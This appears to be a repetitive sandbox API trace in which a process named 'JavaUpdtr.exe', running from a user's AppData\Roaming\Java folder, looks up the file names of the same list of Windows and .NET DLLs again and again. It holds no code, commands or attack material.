Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
